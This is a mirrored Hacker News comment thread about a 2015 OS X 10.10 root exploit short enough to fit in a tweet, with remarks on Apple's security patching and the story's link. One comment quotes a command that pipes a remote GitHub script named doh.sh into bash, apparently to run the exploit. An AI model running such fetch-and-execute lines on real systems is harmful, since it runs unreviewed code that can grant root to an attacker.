TE
科技回声
首页24小时热榜最新最佳问答展示工作
GitHubTwitter
首页

科技回声

基于 Next.js 构建的科技新闻平台,提供全球科技新闻和讨论内容。

GitHubTwitter

首页

首页最新最佳问答展示工作

资源链接

HackerNews API原版 HackerNewsNext.js

© 2025 科技回声. 版权所有。

Exploit to get root on OS X 10.10 fits in a tweet

125 点作者 odedgolan将近 10 年前

10 条评论

yAnonymous将近 10 年前
"Introducing a new command line feature to restore access after losing your password"...
评论 #9935079 未加载
nchelluri将近 10 年前
I like to think of this as a good example of why not to use curl to execute bash scripts.<p><pre><code> curl -s https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;nchelluri&#x2F;rootyourself&#x2F;master&#x2F;doh.sh | bash</code></pre>
评论 #9938038 未加载
roflchoppa将近 10 年前
I always get bummed out over @i0n1c&#x27;s tweets, so many security issues that are just ignored by apple.<p>Anyone have stats on # of exploits per type of OS X. I would want to see how many known security updates were pushed during 10.6 era vs now. At least in the 10.6 era, the OS you were using ( if it was a previous generation) was still getting security updates.
评论 #9935056 未加载
shred45将近 10 年前
Lots of exploits fit in a tweet. Lots don&#x27;t. That really doesn&#x27;t have anything to do with how &quot;bad&quot; or &quot;trivial&quot; it is.
ch将近 10 年前
&quot;&#x27;Apple ships fixes for security in beta versions of future products, but does not fix current versions,&#x27; Esser noted.&quot;<p>Is that really a thing? Apple doesn&#x27;t ship security updates? Or is that just trolling?
评论 #9935118 未加载
评论 #9935055 未加载
评论 #9935141 未加载
deckiedan将近 10 年前
that&#x27;s pretty bad. I just tested it, and it does, indeed work.
评论 #9938344 未加载
mcintyre1994将近 10 年前
Pretty new to OS X, when will Yosemite expect a fix? Is El Capitan Beta stable enough to be a better bet?
评论 #9935202 未加载
jdalgetty将近 10 年前
sudo: unable to stat &#x2F;etc&#x2F;sudoers: Permission denied sudo: no valid sudoers sources found, quitting
anc84将近 10 年前
What is that domain? This is a Register post, here it was submitted as <a href="http:&#x2F;&#x2F;www.theregister.stfi.re&#x2F;2015&#x2F;07&#x2F;22&#x2F;os_x_root_hole&#x2F;?sf=ekxly" rel="nofollow">http:&#x2F;&#x2F;www.theregister.stfi.re&#x2F;2015&#x2F;07&#x2F;22&#x2F;os_x_root_hole&#x2F;?sf...</a> which looks like social media tracking crap.<p><a href="http:&#x2F;&#x2F;www.theregister.co.uk&#x2F;2015&#x2F;07&#x2F;22&#x2F;os_x_root_hole&#x2F;" rel="nofollow">http:&#x2F;&#x2F;www.theregister.co.uk&#x2F;2015&#x2F;07&#x2F;22&#x2F;os_x_root_hole&#x2F;</a> is the actual URL.
评论 #9935041 未加载
评论 #9937795 未加载
评论 #9935133 未加载
dang将近 10 年前
Posted yesterday, but without much discussion: <a href="https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=9933639" rel="nofollow">https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=9933639</a>.